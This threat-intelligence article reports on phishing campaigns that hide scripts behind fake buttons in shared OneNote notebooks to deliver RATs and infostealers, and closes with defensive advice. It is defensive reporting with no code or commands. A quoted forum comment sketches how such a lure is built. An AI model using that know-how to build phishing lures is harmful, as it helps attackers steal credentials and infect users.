A recent Varonis report exposes a rising threat: cyber criminals exploiting Microsoft OneNote to launch “native” phishing campaigns via Microsoft 365. OneNote is a well-established digital note-taking app that provides a single place for keeping users' reminders, research and project information. These attacks exploit trust in legitimate collaboration tools, combining social engineering and cloud infrastructure to bypass traditional defenses. This new attack vector uses shared OneNote notebooks to deliver embedded malware or credential stealing links, all concealed beneath innocuous-looking surfaces, exploiting users’ confidence in trusted ecosystems.[1]
See: https://redskyalliance.org/xindustry/greatness-in-phishing
After Microsoft disabled macros in Office documents in mid 2022, threat actors pivoted to alternative file types. OneNote emerged as ideal, preinstalled with Office or 365, commonly used in organizations, and not flagged as suspicious by email gateways. Crucially, OneNote files can embed attachments VBScript, HTA, BAT, and LNK files hidden behind buttons that mimic legitimate prompts. When users click “Double click to view,” they unwittingly execute malicious code that may download RATs, steal credentials, or implant further malware.
Campaigns often mimic shipping notifications, invoices or internal memos. The OneNote notebook appears to contain a benign document, but embedded scripts drop malware payloads (e.g., AsyncRAT, Redline, AgentTesla, Qakbot, IcedID, DOUBLEBACK) upon user interaction. These attachments camouflaged with PNG or PDF icons launch scripts via batch or PowerShell, and then fetch remote executables via Temp folders or hidden HTA files. In many cases, antivirus tools failed to detect the OneNote-hosted payloads, demonstrating the evasion efficacy of behavioral rather than signature based defenses.
The attack hinges on social engineering. These campaigns are effective because users trust Microsoft 365 files sent within familiar workflows. Even when OneNote warns that an attachment may compromise security, users often ignore the alert. Moreover, nested attachments (batches calling HTA executing PowerShell deploying malware) obscure the threat chain.
Reddit commentators corroborate these findings. One noted. “It’s dumber than it sounds. You can drag and drop a .vbs or .js file right on top of a Onenote file… Crazy part is you can put a big blue piece of text… and the clicks run the executable.” Another warned: “If you don’t use .one… delete on sight any messages with one attached no matter who they are from.”
The tactic has proliferated since December 2022. Proofpoint recorded just six campaigns then, rising to over fifty by January 2023. Notable malware families included AsyncRAT, Redline, AgentTesla, DOUBLEBACK and Qakbot via TA577.
This technique now spans banking malware, RATs, and infostealers; telemetry shows infections across sectors including manufacturing, telecoms and high tech.
Sund advice says that a layered defense; enforce multi factor authentication (MFA), tighten conditional access, and adjust sharing settings to restrict unwarranted access. Many stress user centric awareness campaigns that teach staff to hover before clicking and never move through links in unsolicited OneNote notebooks. Technical controls include blocking inbound .one attachments at mail gateway level, deploying behavioral based endpoint detection, and implementing threat hunting rules to flag unusually opened OneNote files in temporary folders ( [withsecure.com] ). Default warnings in OneNote can be suppressed by users, so monitoring execution events for scripts is essential.
OneNote based phishing epitomizes how attackers exploit living off the land techniques and no code tools within cloud ecosystems. By hiding malicious payloads in ostensibly benign collaboration artefacts, they can outflank signature-based defenses. Putting it bluntly: “It’s not just about securing systems; it’s about securing people.”
Defense demands both technical vigilances blocking suspicious file types, tightening sharing protocols, deploying behavioral detection and ongoing user education. The moment a malicious notebook lands in an inbox, the window for exploitation opens.
This article is shared with permission at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122
[1] https://www.cybersecurityintelligence.com/blog/the-new-face-of-phishing-8573.html
Comments